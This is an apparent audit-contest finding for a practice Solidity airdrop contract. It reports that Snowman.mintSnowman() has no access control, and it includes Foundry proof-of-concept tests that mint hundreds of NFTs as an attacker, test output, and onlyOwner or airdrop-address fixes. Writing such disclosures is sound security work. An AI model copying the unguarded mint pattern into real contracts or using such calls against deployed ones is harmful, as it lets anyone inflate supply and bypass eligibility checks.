Snowman Merkle Airdrop

AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Permissionless mintSnowman() allows anyone to bypass the airdrop and mint unlimited NFTs

Root + Impact

Description

Snowman NFTs are intended to be minted only after a recipient successfully completes the claim process through SnowmanAirdrop.claimSnowman(). That process validates the recipient's signature and Merkle proof and transfers the required Snow tokens before minting the corresponding NFTs.

However, Snowman.mintSnowman() is declared external without any access-control restriction. Any externally owned account or contract can call the function directly and mint an arbitrary number of Snowman NFTs to any receiver.

This bypasses the entire airdrop process, including the Snow-token requirement, Merkle eligibility verification, and signature validation.

function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

The missing authorization check is located at the function entry point:

@> function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

Risk

Likelihood

  • mintSnowman() is callable by every address.

  • Exploitation requires no privileged role, Snow tokens, Merkle proof, signature, approval, or payment.

  • An attacker can mint NFTs immediately after the contract is deployed.

  • The attacker can repeat the call across multiple transactions to continuously increase the NFT supply.

Impact

  • Attackers can mint arbitrary quantities of Snowman NFTs without satisfying the airdrop requirements.

  • The Merkle-tree eligibility mechanism is completely bypassed.

  • The Snow-token staking or conversion requirement is completely bypassed.

  • Unauthorized NFTs dilute legitimate recipients and destroy the intended scarcity of the collection.

  • Attackers can consume token IDs and permanently inflate the NFT supply.

Proof of Concept

Create test/PermissionlessMint.t.sol with the following test:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
import {Test} from "forge-std/Test.sol";
import {Snowman} from "../src/Snowman.sol";
contract PermissionlessMintTest is Test {
Snowman internal snowman;
address internal attacker;
function setUp() public {
snowman = new Snowman("data:image/svg+xml;base64,");
attacker = makeAddr("attacker");
}
function test_AnyoneCanMintSnowmenWithoutAirdropAuthorization() public {
assertEq(snowman.balanceOf(attacker), 0);
assertEq(snowman.getTokenCounter(), 0);
// The attacker has no privileged role and has not interacted with
// SnowmanAirdrop, supplied a Merkle proof, signed a claim, or
// transferred any Snow tokens.
vm.prank(attacker);
snowman.mintSnowman(attacker, 100);
assertEq(snowman.balanceOf(attacker), 100);
assertEq(snowman.getTokenCounter(), 100);
for (uint256 tokenId = 0; tokenId < 100; tokenId++) {
assertEq(snowman.ownerOf(tokenId), attacker);
}
}
}

Run the test with:

forge test --match-test test_AnyoneCanMintSnowmenWithoutAirdropAuthorization -vv

The test passes and demonstrates that an arbitrary attacker can directly mint 100 Snowman NFTs without owning Snow tokens, providing a Merkle proof, supplying a signature, or interacting with SnowmanAirdrop.

Recommended Mitigation

Restrict mintSnowman() so that only the authorized SnowmanAirdrop contract can call it.

Because Snowman already inherits Ownable, the function can be protected using onlyOwner:

- function mintSnowman(address receiver, uint256 amount) external {
+ function mintSnowman(address receiver, uint256 amount) external onlyOwner {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

After deploying SnowmanAirdrop, ownership of the Snowman contract must be transferred to the airdrop contract:

snowman.transferOwnership(address(snowmanAirdrop));

Alternatively, store the authorized airdrop address explicitly and validate msg.sender:

+ address private immutable i_airdrop;
- constructor(string memory _SnowmanSvgUri)
+ constructor(string memory _SnowmanSvgUri, address airdrop)
ERC721("Snowman Airdrop", "SNOWMAN")
Ownable(msg.sender)
{
+ if (airdrop == address(0)) {
+ revert SM__NotAllowed();
+ }
+
s_TokenCounter = 0;
s_SnowmanSvgUri = _SnowmanSvgUri;
+ i_airdrop = airdrop;
}
function mintSnowman(address receiver, uint256 amount) external {
+ if (msg.sender != i_airdrop) {
+ revert SM__NotAllowed();
+ }
+
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!